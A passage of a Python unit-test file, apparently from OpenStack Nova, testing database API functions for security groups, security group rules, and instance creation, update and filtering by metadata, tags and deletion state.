'updated_at': None
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def _create_security_group_rule(self, values):
v = self._get_base_rule_values()
v.update(values)
return db.security_group_rule_create(self.ctxt, v)
def test_security_group_rule_create(self):
security_group_rule = self._create_security_group_rule({})
self.assertIsNotNone(security_group_rule['id'])
for key, value in self._get_base_rule_values().items():
self.assertEqual(value, security_group_rule[key])
def _test_security_group_rule_get_by_security_group(self, columns=None):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
security_group = self._create_security_group({
'instances': [instance]})
security_group_rule = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
security_group_rule1 = self._create_security_group_rule(
{'parent_group': security_group, 'grantee_group': security_group})
found_rules = db.security_group_rule_get_by_security_group(
self.ctxt, security_group['id'], columns_to_join=columns)
self.assertEqual(len(found_rules), 2)
rules_ids = [security_group_rule['id'], security_group_rule1['id']]
for rule in found_rules:
if columns is None:
self.assertIn('grantee_group', dict(rule))
self.assertIn('instances',
dict(rule.grantee_group))
self.assertIn(
'system_metadata',
dict(rule.grantee_group.instances[0]))
self.assertIn(rule['id'], rules_ids)
else:
self.assertNotIn('grantee_group', dict(rule))
def test_security_group_rule_get_by_security_group(self):
self._test_security_group_rule_get_by_security_group()
def test_security_group_rule_get_by_security_group_no_joins(self):
self._test_security_group_rule_get_by_security_group(columns=[])
def test_security_group_rule_get_by_security_group_grantee(self):
security_group = self._create_security_group({})
security_group_rule = self._create_security_group_rule(
{'grantee_group': security_group})
rules = db.security_group_rule_get_by_security_group_grantee(self.ctxt,
security_group['id'])
self.assertEqual(len(rules), 1)
self.assertEqual(rules[0]['id'], security_group_rule['id'])
def test_security_group_rule_destroy(self):
self._create_security_group({'name': 'fake1'})
self._create_security_group({'name': 'fake2'})
security_group_rule1 = self._create_security_group_rule({})
security_group_rule2 = self._create_security_group_rule({})
db.security_group_rule_destroy(self.ctxt, security_group_rule1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get,
self.ctxt, security_group_rule1['id'])
self._assertEqualObjects(db.security_group_rule_get(self.ctxt,
security_group_rule2['id']),
security_group_rule2, ['grantee_group'])
def test_security_group_rule_destroy_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_destroy, self.ctxt, 100500)
def test_security_group_rule_get(self):
security_group_rule1 = (
self._create_security_group_rule({}))
self._create_security_group_rule({})
real_security_group_rule = db.security_group_rule_get(self.ctxt,
security_group_rule1['id'])
self._assertEqualObjects(security_group_rule1,
real_security_group_rule, ['grantee_group'])
def test_security_group_rule_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_rule_get, self.ctxt, 100500)
def test_security_group_rule_count_by_group(self):
sg1 = self._create_security_group({'name': 'fake1'})
sg2 = self._create_security_group({'name': 'fake2'})
rules_by_group = {sg1: [], sg2: []}
for group in rules_by_group:
rules = rules_by_group[group]
for i in range(0, 10):
rules.append(
self._create_security_group_rule({'parent_group_id':
group['id']}))
db.security_group_rule_destroy(self.ctxt,
rules_by_group[sg1][0]['id'])
counted_groups = [db.security_group_rule_count_by_group(self.ctxt,
group['id'])
for group in [sg1, sg2]]
expected = [9, 10]
self.assertEqual(counted_groups, expected)
class SecurityGroupTestCase(test.TestCase, ModelsObjectComparatorMixin):
def setUp(self):
super(SecurityGroupTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _get_base_values(self):
return {
'name': 'fake_sec_group',
'description': 'fake_sec_group_descr',
'user_id': 'fake',
'project_id': 'fake',
'instances': []
}
def _create_security_group(self, values):
v = self._get_base_values()
v.update(values)
return db.security_group_create(self.ctxt, v)
def test_security_group_create(self):
security_group = self._create_security_group({})
self.assertIsNotNone(security_group['id'])
for key, value in self._get_base_values().items():
self.assertEqual(value, security_group[key])
def test_security_group_destroy(self):
security_group1 = self._create_security_group({})
security_group2 = \
self._create_security_group({'name': 'fake_sec_group2'})
db.security_group_destroy(self.ctxt, security_group1['id'])
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get,
self.ctxt, security_group1['id'])
self._assertEqualObjects(db.security_group_get(
self.ctxt, security_group2['id'],
columns_to_join=['instances']), security_group2)
def test_security_group_get(self):
security_group1 = self._create_security_group({})
self._create_security_group({'name': 'fake_sec_group2'})
real_security_group = db.security_group_get(self.ctxt,
security_group1['id'],
columns_to_join=['instances'])
self._assertEqualObjects(security_group1,
real_security_group)
def test_security_group_get_with_instance_columns(self):
instance = db.instance_create(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
secgroup = self._create_security_group({'instances': [instance]})
secgroup = db.security_group_get(
self.ctxt, secgroup['id'],
columns_to_join=['instances.system_metadata'])
inst = secgroup.instances[0]
self.assertIn('system_metadata', dict(inst).keys())
def test_security_group_get_no_instances(self):
instance = db.instance_create(self.ctxt, {})
sid = self._create_security_group({'instances': [instance]})['id']
security_group = db.security_group_get(self.ctxt, sid,
columns_to_join=['instances'])
self.assertIn('instances', security_group.__dict__)
security_group = db.security_group_get(self.ctxt, sid)
self.assertNotIn('instances', security_group.__dict__)
def test_security_group_get_not_found_exception(self):
self.assertRaises(exception.SecurityGroupNotFound,
db.security_group_get, self.ctxt, 100500)
def test_security_group_get_by_name(self):
security_group1 = self._create_security_group({'name': 'fake1'})
security_group2 = self._create_security_group({'name': 'fake2'})
real_security_group1 = db.security_group_get_by_name(
self.ctxt,
security_group1['project_id'],
security_group1['name'],
columns_to_join=None)
real_security_group2 = db.security_group_get_by_name(
self.ctxt,
security_group2['project_id'],
security_group2['name'],
columns_to_join=None)
self._assertEqualObjects(security_group1, real_security_group1)
self._assertEqualObjects(security_group2, real_security_group2)
def test_security_group_get_by_project(self):
security_group1 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake2', 'project_id': 'fake_proj2'})
real1 = db.security_group_get_by_project(
self.ctxt,
security_group1['project_id'])
real2 = db.security_group_get_by_project(
self.ctxt,
security_group2['project_id'])
expected1, expected2 = [security_group1], [security_group2]
self._assertEqualListsOfObjects(expected1, real1,
ignored_keys=['instances'])
self._assertEqualListsOfObjects(expected2, real2,
ignored_keys=['instances'])
def test_security_group_get_by_instance(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'name': 'fake1', 'instances': [instance]},
{'name': 'fake2', 'instances': [instance]},
{'name': 'fake3', 'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_by_instance(self.ctxt,
instance['uuid'])
expected = security_groups[:2]
self._assertEqualListsOfObjects(expected, real,
ignored_keys=['instances'])
def test_security_group_get_all(self):
values = [
{'name': 'fake1', 'project_id': 'fake_proj1'},
{'name': 'fake2', 'project_id': 'fake_proj2'},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = db.security_group_get_all(self.ctxt)
self._assertEqualListsOfObjects(security_groups, real,
ignored_keys=['instances'])
def test_security_group_in_use(self):
instance = db.instance_create(self.ctxt, dict(host='foo'))
values = [
{'instances': [instance],
'name': 'fake_in_use'},
{'instances': []},
]
security_groups = [self._create_security_group(vals)
for vals in values]
real = []
for security_group in security_groups:
in_use = db.security_group_in_use(self.ctxt,
security_group['id'])
real.append(in_use)
expected = [True, False]
self.assertEqual(expected, real)
def test_security_group_ensure_default(self):
self.ctxt.project_id = 'fake'
self.ctxt.user_id = 'fake'
self.assertEqual(0, len(db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)))
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
self.assertEqual("default", security_groups[0]["name"])
usage = db.quota_usage_get(self.ctxt,
self.ctxt.project_id,
'security_groups',
self.ctxt.user_id)
self.assertEqual(1, usage.in_use)
@mock.patch.object(db.sqlalchemy.api, '_security_group_get_by_names')
def test_security_group_ensure_default_called_concurrently(self, sg_mock):
# make sure NotFound is always raised here to trick Nova to insert the
# duplicate security group entry
sg_mock.side_effect = exception.NotFound
# create the first db entry
self.ctxt.project_id = 1
db.security_group_ensure_default(self.ctxt)
security_groups = db.security_group_get_by_project(
self.ctxt,
self.ctxt.project_id)
self.assertEqual(1, len(security_groups))
# create the second one and ensure the exception is handled properly
default_group = db.security_group_ensure_default(self.ctxt)
self.assertEqual('default', default_group.name)
def test_security_group_update(self):
security_group = self._create_security_group({})
new_values = {
'name': 'sec_group1',
'description': 'sec_group_descr1',
'user_id': 'fake_user1',
'project_id': 'fake_proj1',
}
updated_group = db.security_group_update(self.ctxt,
security_group['id'],
new_values,
columns_to_join=['rules.grantee_group'])
for key, value in new_values.items():
self.assertEqual(updated_group[key], value)
self.assertEqual(updated_group['rules'], [])
def test_security_group_update_to_duplicate(self):
self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj1'})
security_group2 = self._create_security_group(
{'name': 'fake1', 'project_id': 'fake_proj2'})
self.assertRaises(exception.SecurityGroupExists,
db.security_group_update,
self.ctxt, security_group2['id'],
{'project_id': 'fake_proj1'})
class InstanceTestCase(test.TestCase, ModelsObjectComparatorMixin):
"""Tests for db.api.instance_* methods."""
sample_data = {
'project_id': 'project1',
'hostname': 'example.com',
'host': 'h1',
'node': 'n1',
'metadata': {'mkey1': 'mval1', 'mkey2': 'mval2'},
'system_metadata': {'smkey1': 'smval1', 'smkey2': 'smval2'},
'info_cache': {'ckey': 'cvalue'},
}
def setUp(self):
super(InstanceTestCase, self).setUp()
self.ctxt = context.get_admin_context()
def _assertEqualInstances(self, instance1, instance2):
self._assertEqualObjects(instance1, instance2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def _assertEqualListsOfInstances(self, list1, list2):
self._assertEqualListsOfObjects(list1, list2,
ignored_keys=['metadata', 'system_metadata', 'info_cache',
'extra'])
def create_instance_with_args(self, **kwargs):
if 'context' in kwargs:
context = kwargs.pop('context')
else:
context = self.ctxt
args = self.sample_data.copy()
args.update(kwargs)
return db.instance_create(context, args)
def test_instance_create(self):
instance = self.create_instance_with_args()
self.assertTrue(uuidutils.is_uuid_like(instance['uuid']))
def test_instance_create_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_with_object_values(self):
values = {
'access_ip_v4': netaddr.IPAddress('1.2.3.4'),
'access_ip_v6': netaddr.IPAddress('::1'),
}
dt_keys = ('created_at', 'deleted_at', 'updated_at',
'launched_at', 'terminated_at')
dt = timeutils.utcnow()
dt_utc = dt.replace(tzinfo=iso8601.iso8601.Utc())
for key in dt_keys:
values[key] = dt_utc
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(inst['access_ip_v4'], '1.2.3.4')
self.assertEqual(inst['access_ip_v6'], '::1')
for key in dt_keys:
self.assertEqual(inst[key], dt)
def test_instance_update_no_metadata_clobber(self):
meta = {'foo': 'bar'}
sys_meta = {'sfoo': 'sbar'}
values = {
'metadata': meta,
'system_metadata': sys_meta,
}
inst = db.instance_create(self.ctxt, {})
inst = db.instance_update(self.ctxt, inst['uuid'], values)
self.assertEqual(meta, utils.metadata_to_dict(inst['metadata']))
self.assertEqual(sys_meta,
utils.metadata_to_dict(inst['system_metadata']))
def test_instance_get_all_with_meta(self):
self.create_instance_with_args()
for inst in db.instance_get_all(self.ctxt):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_update(self):
instance = self.create_instance_with_args()
metadata = {'host': 'bar', 'key2': 'wuff'}
system_metadata = {'original_image_ref': 'baz'}
# Update the metadata
db.instance_update(self.ctxt, instance['uuid'], {'metadata': metadata,
'system_metadata': system_metadata})
# Retrieve the user-provided metadata to ensure it was successfully
# updated
self.assertEqual(metadata,
db.instance_metadata_get(self.ctxt, instance['uuid']))
self.assertEqual(system_metadata,
db.instance_system_metadata_get(self.ctxt, instance['uuid']))
def test_instance_update_bad_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '123'}
self.assertRaises(ValueError,
db.instance_update,
self.ctxt, instance['uuid'], values)
def test_instance_update_good_str_dates(self):
instance = self.create_instance_with_args()
values = {'created_at': '2011-01-31T00:00:00.0'}
actual = db.instance_update(self.ctxt, instance['uuid'], values)
expected = datetime.datetime(2011, 1, 31)
self.assertEqual(expected, actual["created_at"])
def test_create_instance_unique_hostname(self):
context1 = context.RequestContext('user1', 'p1')
context2 = context.RequestContext('user2', 'p2')
self.create_instance_with_args(hostname='h1', project_id='p1')
# With scope 'global' any duplicate should fail, be it this project:
self.flags(osapi_compute_unique_server_name_scope='global')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p3')
# or another:
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context2,
hostname='h1', project_id='p2')
# With scope 'project' a duplicate in the project should fail:
self.flags(osapi_compute_unique_server_name_scope='project')
self.assertRaises(exception.InstanceExists,
self.create_instance_with_args,
context=context1,
hostname='h1', project_id='p1')
# With scope 'project' a duplicate in a different project should work:
self.flags(osapi_compute_unique_server_name_scope='project')
self.create_instance_with_args(context=context2, hostname='h2')
self.flags(osapi_compute_unique_server_name_scope=None)
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_all_by_filters_extra_columns(self,
mock_joinedload,
mock_undefer):
db.instance_get_all_by_filters_sort(
self.ctxt, {},
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
@mock.patch('nova.db.sqlalchemy.api.undefer')
@mock.patch('nova.db.sqlalchemy.api.joinedload')
def test_instance_get_active_by_window_extra_columns(self,
mock_joinedload,
mock_undefer):
now = datetime.datetime(2013, 10, 10, 17, 16, 37, 156701)
db.instance_get_active_by_window_joined(
self.ctxt, now,
columns_to_join=['info_cache', 'extra.pci_requests'])
mock_joinedload.assert_called_once_with('info_cache')
mock_undefer.assert_called_once_with('extra.pci_requests')
def test_instance_get_all_by_filters_with_meta(self):
self.create_instance_with_args()
for inst in db.instance_get_all_by_filters(self.ctxt, {}):
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_without_meta(self):
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt, {},
columns_to_join=[])
for inst in result:
meta = utils.metadata_to_dict(inst['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(inst['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_all_by_filters(self):
instances = [self.create_instance_with_args() for i in range(3)]
filtered_instances = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfInstances(instances, filtered_instances)
def test_instance_get_all_by_filters_zero_limit(self):
self.create_instance_with_args()
instances = db.instance_get_all_by_filters(self.ctxt, {}, limit=0)
self.assertEqual([], instances)
def test_instance_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
meta = sqlalchemy_api._instance_metadata_get_multi(self.ctxt, uuids)
for row in meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_metadata_get_multi(self.ctxt, [])
def test_instance_system_system_metadata_get_multi(self):
uuids = [self.create_instance_with_args()['uuid'] for i in range(3)]
sys_meta = sqlalchemy_api._instance_system_metadata_get_multi(
self.ctxt, uuids)
for row in sys_meta:
self.assertIn(row['instance_uuid'], uuids)
def test_instance_system_metadata_get_multi_no_uuids(self):
self.mox.StubOutWithMock(query.Query, 'filter')
self.mox.ReplayAll()
sqlalchemy_api._instance_system_metadata_get_multi(self.ctxt, [])
def test_instance_get_all_by_filters_regex(self):
i1 = self.create_instance_with_args(display_name='test1')
i2 = self.create_instance_with_args(display_name='teeeest2')
self.create_instance_with_args(display_name='diff')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': 't.*st.'})
self._assertEqualListsOfInstances(result, [i1, i2])
def test_instance_get_all_by_filters_changes_since(self):
i1 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:25.000000')
i2 = self.create_instance_with_args(updated_at=
'2013-12-05T15:03:26.000000')
changes_since = iso8601.parse_date('2013-12-05T15:03:25.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i1, i2], result)
changes_since = iso8601.parse_date('2013-12-05T15:03:26.000000')
result = db.instance_get_all_by_filters(self.ctxt,
{'changes-since':
changes_since})
self._assertEqualListsOfInstances([i2], result)
def test_instance_get_all_by_filters_exact_match(self):
instance = self.create_instance_with_args(host='host1')
self.create_instance_with_args(host='host12')
result = db.instance_get_all_by_filters(self.ctxt,
{'host': 'host1'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_metadata(self):
instance = self.create_instance_with_args(metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_system_metadata(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
self.create_instance_with_args()
result = db.instance_get_all_by_filters(self.ctxt,
{'system_metadata': {'foo': 'bar'}})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_unicode_value(self):
instance = self.create_instance_with_args(display_name=u'test♥')
result = db.instance_get_all_by_filters(self.ctxt,
{'display_name': u'test'})
self._assertEqualListsOfInstances([instance], result)
def test_instance_get_all_by_filters_tags(self):
instance = self.create_instance_with_args(
metadata={'foo': 'bar'})
self.create_instance_with_args()
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
{'name': 'tag-value', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self._assertEqualListsOfInstances([instance], result)
# For non-existent tag
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'barred'},
]})
self.assertEqual([], result)
# Confirm with deleted tags
db.instance_metadata_delete(self.ctxt, instance['uuid'], 'foo')
# For format 'tag-'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-key', 'value': 'foo'},
]})
self.assertEqual([], result)
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag-value', 'value': 'bar'}
]})
self.assertEqual([], result)
# For format 'tag:'
result = db.instance_get_all_by_filters(
self.ctxt, {'filter': [
{'name': 'tag:foo', 'value': 'bar'},
]})
self.assertEqual([], result)
def test_instance_get_by_uuid(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'])
self._assertEqualInstances(inst, result)
def test_instance_get_by_uuid_join_empty(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=[])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, self.sample_data['metadata'])
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, {})
def test_instance_get_by_uuid_join_sys_meta(self):
inst = self.create_instance_with_args()
result = db.instance_get_by_uuid(self.ctxt, inst['uuid'],
columns_to_join=['system_metadata'])
meta = utils.metadata_to_dict(result['metadata'])
self.assertEqual(meta, {})
sys_meta = utils.metadata_to_dict(result['system_metadata'])
self.assertEqual(sys_meta, self.sample_data['system_metadata'])
def test_instance_get_all_by_filters_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt, {})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['metadata', 'system_metadata',
'deleted', 'deleted_at', 'info_cache',
'pci_devices', 'extra'])
def test_instance_get_all_by_filters_deleted_no_soft_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': True,
'soft_deleted': False})
self._assertEqualListsOfObjects([inst1], result,
ignored_keys=['deleted', 'deleted_at', 'metadata',
'system_metadata', 'info_cache', 'pci_devices',
'extra'])
def test_instance_get_all_by_filters_alive_and_soft_deleted(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False,
'soft_deleted': True})
self._assertEqualListsOfInstances([inst2, inst3], result)
def test_instance_get_all_by_filters_not_deleted(self):
inst1 = self.create_instance_with_args()
self.create_instance_with_args(vm_state=vm_states.SOFT_DELETED)
inst3 = self.create_instance_with_args()
inst4 = self.create_instance_with_args(vm_state=vm_states.ACTIVE)
db.instance_destroy(self.ctxt, inst1['uuid'])
result = db.instance_get_all_by_filters(self.ctxt,
{'deleted': False})
self.assertIsNone(inst3.vm_state)
self._assertEqualListsOfInstances([inst3, inst4], result)
def test_instance_get_all_by_filters_cleaned(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args(reservation_id='b')
db.instance_update(self.ctxt, inst1['uuid'], {'cleaned': 1})
result = db.instance_get_all_by_filters(self.ctxt, {})
self.assertEqual(2, len(result))
self.assertIn(inst1['uuid'], [result[0]['uuid'], result[1]['uuid']])
self.assertIn(inst2['uuid'], [result[0]['uuid'], result[1]['uuid']])
if inst1['uuid'] == result[0]['uuid']:
self.assertTrue(result[0]['cleaned'])
self.assertFalse(result[1]['cleaned'])
else:
self.assertTrue(result[1]['cleaned'])
self.assertFalse(result[0]['cleaned'])
def test_instance_get_all_by_filters_tag_any(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t3])
db.instance_tag_set(self.ctxt, inst3.uuid, [t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t1, t2]})
self._assertEqualListsOfObjects([inst1, inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_any_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag-any': [t3, t4]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t3])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst3.uuid, [t1, t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2]})
self._assertEqualListsOfObjects([inst2, inst3], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_filters_tag_empty(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t3]})
self.assertEqual([], result)
def test_instance_get_all_by_filters_tag_any_and_tag(self):
inst1 = self.create_instance_with_args()
inst2 = self.create_instance_with_args()
inst3 = self.create_instance_with_args()
t1 = 'tag1'
t2 = 'tag2'
t3 = 'tag3'
t4 = 'tag4'
db.instance_tag_set(self.ctxt, inst1.uuid, [t1, t2])
db.instance_tag_set(self.ctxt, inst2.uuid, [t1, t2, t4])
db.instance_tag_set(self.ctxt, inst3.uuid, [t2, t3])
result = db.instance_get_all_by_filters(self.ctxt,
{'tag': [t1, t2],
'tag-any': [t3, t4]})
self._assertEqualListsOfObjects([inst2], result,
ignored_keys=['deleted', 'deleted_at', 'metadata', 'extra',
'system_metadata', 'info_cache', 'pci_devices'])
def test_instance_get_all_by_host_and_node_no_join(self):
instance = self.create_instance_with_args()
result = db.instance_get_all_by_host_and_node(self.ctxt, 'h1', 'n1')
self.assertEqual(result[0]['uuid'], instance['uuid'])
self.assertEqual(result[0]['system_metadata'], [])
def test_instance_get_all_by_host_and_node(self):
instance = self.create_instance_with_args(
system_metadata={'foo': 'bar'})
result = db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['system_metadata', 'extra'])
self.assertEqual(instance['uuid'], result[0]['uuid'])
self.assertEqual('bar', result[0]['system_metadata'][0]['value'])
self.assertEqual(instance['uuid'], result[0]['extra']['instance_uuid'])
@mock.patch('nova.db.sqlalchemy.api._instances_fill_metadata')
@mock.patch('nova.db.sqlalchemy.api._instance_get_all_query')
def test_instance_get_all_by_host_and_node_fills_manually(self,
mock_getall,
mock_fill):
db.instance_get_all_by_host_and_node(
self.ctxt, 'h1', 'n1',
columns_to_join=['metadata', 'system_metadata', 'extra', 'foo'])
self.assertEqual(sorted(['extra', 'foo']),
sorted(mock_getall.call_args[1]['joins']))
self.assertEqual(sorted(['metadata', 'system_metadata']),
sorted(mock_fill.call_args[1]['manual_joins']))
def test_instance_get_all_hung_in_rebooting(self):
# Ensure no instances are returned.
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
# Ensure one rebooting instance with updated_at older than 10 seconds
# is returned.
instance = self.create_instance_with_args(task_state="rebooting",
updated_at=datetime.datetime(2000, 1, 1, 12, 0, 0))
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self._assertEqualListsOfObjects([instance], results,
ignored_keys=['task_state', 'info_cache', 'security_groups',
'metadata', 'system_metadata', 'pci_devices',
'extra'])
db.instance_update(self.ctxt, instance['uuid'], {"task_state": None})
# Ensure the newly rebooted instance is not returned.
self.create_instance_with_args(task_state="rebooting",
updated_at=timeutils.utcnow())
results = db.instance_get_all_hung_in_rebooting(self.ctxt, 10)
self.assertEqual([], results)
def test_instance_update_with_expected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
db.instance_update(self.ctxt, instance['uuid'], {'host': 'h1',
'expected_vm_state': ('foo', 'bar')})
def test_instance_update_with_unexpected_vm_state(self):
instance = self.create_instance_with_args(vm_state='foo')
self.assertRaises(exception.UnexpectedVMStateError,
db.instance_update, self.ctxt, instance['uuid'],
{'host': 'h1', 'expected_vm_state': ('spam', 'bar')})
def test_instance_update_with_instance_uuid(self):
# test instance_update() works when an instance UUID is passed.
ctxt = context.get_admin_context()
# Create an instance with some metadata
values = {'metadata': {'host': 'foo', 'key1': 'meow'},
'system_metadata': {'original_image_ref': 'blah'}}
instance = db.instance_create(ctxt, values)
# Update the metadata
values = {'metadata': {'host': 'bar', 'key2': 'wuff'},
'system_metadata': {'original_image_ref': 'baz'}}
db.instance_update(ctxt, instance['uuid'], values)
# Retrieve the user-provided metadata to ensure it was successfully
# updated
instance_meta = db.instance_metadata_get(ctxt, instance['uuid'])
self.assertEqual('bar', instance_meta['host'])
self.assertEqual('wuff', instance_meta['key2'])
self.assertNotIn('key1', instance_meta)
# Retrieve the system metadata to ensure it was successfully updated
system_meta = db.instance_system_metadata_get(ctxt, instance['uuid'])
